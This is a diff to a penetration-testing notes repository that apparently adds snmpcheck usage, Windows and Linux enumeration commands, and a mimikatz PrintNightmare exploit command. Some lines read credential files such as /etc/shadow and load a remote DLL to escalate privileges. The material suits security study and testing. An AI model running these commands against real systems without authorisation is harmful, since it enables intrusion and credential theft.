enumeration

enumeration/docs/snmp/snmpcheck.md

@@ -0,0 +1,15 @@
+# snmpcheck
+
+* [git repo](https://gitlab.com/kalilinux/packages/snmpcheck.git)
+* Ruby script, clone and
+```sh
+cd snmpcheck
+gem install snmp
+chmod 775 snmpcheck-<version>.rb
+```
+
+## Usage
+
+```sh
+./snmpcheck-<version>.rb $TARGET_IP -c <community-string>
+```

enumeration/windows/manual_enum.md

@@ -1,17 +1,71 @@
 # Manual Windows Enumeration
 
+## General Info
+
+```sh
+systeminfo
+```
+
+* Check installed updates
+```sh
+wmic qfe get Caption,Description
+```
+
+## Users
+
 * `whoami /priv`
 * `whoami /groups`
+* `whoami /all`
+* `net user`
+
+* `net group`
+* `net localgroup <groupname>`
+* `net accounts`
+* `net accounts /domain`
+
+## Network Info
+
+```sh
+ipconfig
+ipconfig /all
+```
+
+```sh
+netstat -noba
+```
+
+```sh
+arp -a
+```
+
+* Show shares
+```sh
+net share
+```
+
+## Services
+
+```sh
+net start
+wmic service get name,version,vendor
+```
+
+### Non-Default Services
+
 * Looking for non-default services:
 ```sh
 wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
 ```
+
     * **Unquoted Service Path** Ideally there is a path without quotation
     * Check which account the service the services run as
+
     ```sh
     sc qc <ServiceName>
     ```
+
 * Check if directory is writeable
+
 ```sh
 powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
 ```

exploit/windows/print_nightmare/print_nightmare.md

@@ -23,6 +23,13 @@ python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_I
 ```
 * Use the meterpreter session
 
+### Mimikatz
+
+* Printnightmare modules of mimikatz
+```sh
+misc::printnightmare /target:<domain.com> /authuser:<lowpriv_user> /authpassword:<password> /library:\\<domain.com>\path\to\printnightmare.dll
+```
+
 ## IOCs
 
 * `pcAddPrinterDriverEx()` is called

post_exploitation/docs/linux.md

@@ -1,28 +1,58 @@
-# Linux enumeration
+# Linux Enumeration
+
+## First Checks
+
+```sh
+cat /etc/*-release 
+cat /proc/version
+```
+
+```sh
+hostname or cat /etc/hostname
+cat /etc/hosts
+```
+
+```sh
+cat /etc/resolve.conf
+cat /etc/systemd/resolved.conf
+uname -a
+cat /etc/issue
+ps wuax  or ps ajxf or ps -A
+printenv or env
+cat /etc/timezone or timedatectl
+```
+
+## Users
+
+```sh
+sudo -l
+id
+whoami
+groups and getent group or cat /etc/group
+cat /etc/passwd | column -t -s :
+cat /etc/shadow
+cat /etc/group
+cat /etc/sudoers
+history
+cat /var/mail
+```
+
+
+## Network Info
+
+* The output of information will be different, depending on permissions of the user
+```sh
+ip a or ifconfig
+ip route
+cat /etc/network/interfaces
+netstat -natup or ss -natup
+netstat -tupln or ss -tulpn
+netstat -s and netstat -i
+lsof -i :<port>
+```
 
-* `cat /etc/*-release` * `cat /proc/version`
-* `hostname` or `cat /etc/hostname`
-* `cat /etc/hosts`
-* `cat /etc/resolve.conf`
-* `uname -a`
-* `cat /etc/issue`
-* `ps wuax ` or `ps ajxf` or `ps -A`
-* `printenv` or `env`
-* `cat /etc/timezone` or `timedatectl`
-* `sudo -l`
-* `id`
-* `whoami`
-* `groups` and `getent group` or `cat /etc/group`
-* `cat /etc/passwd | column -t -s :`
-* `cat /etc/sudoers`
-* `history`
-* `ip` or `ifconfig`
-* `ip route`
-* `cat /etc/network/interfaces`
-* `netstat -natup` or `ss -natup`
-* `netstat -s` and `netstat -i`
-* `lsof -i`
 ## Login Info
+
 ```sh
 last -f /var/log/wtmp
 last -f /var/log/btmp
@@ -39,13 +69,14 @@ less /var/log/syslog
 ```
 
 ## Auth Logs
+
 ```sh
 cat /var/log/auth.log | less
 cat /var/log/access.log | less
-
 ```
 
 ## Find Files
+
 * Find SUID permissions on files and dirs
 * `find / -perm /6000 -ls 2>/dev/null`
 
@@ -63,8 +94,13 @@ cat /var/log/access.log | less
 ```sh
 ls -al /etc/systemd/system && ls -la /var/lib/systemd/system || ls -la /etc/init.d 
 ```
+
 ```sh
 cat /etc/crontab
 crontab -l
 cat /etc/bash.bashrc ; cat /etc/profile
 ```
+
+## Packet Managers
+
+* pacman, apt, dpkg, dnf etc.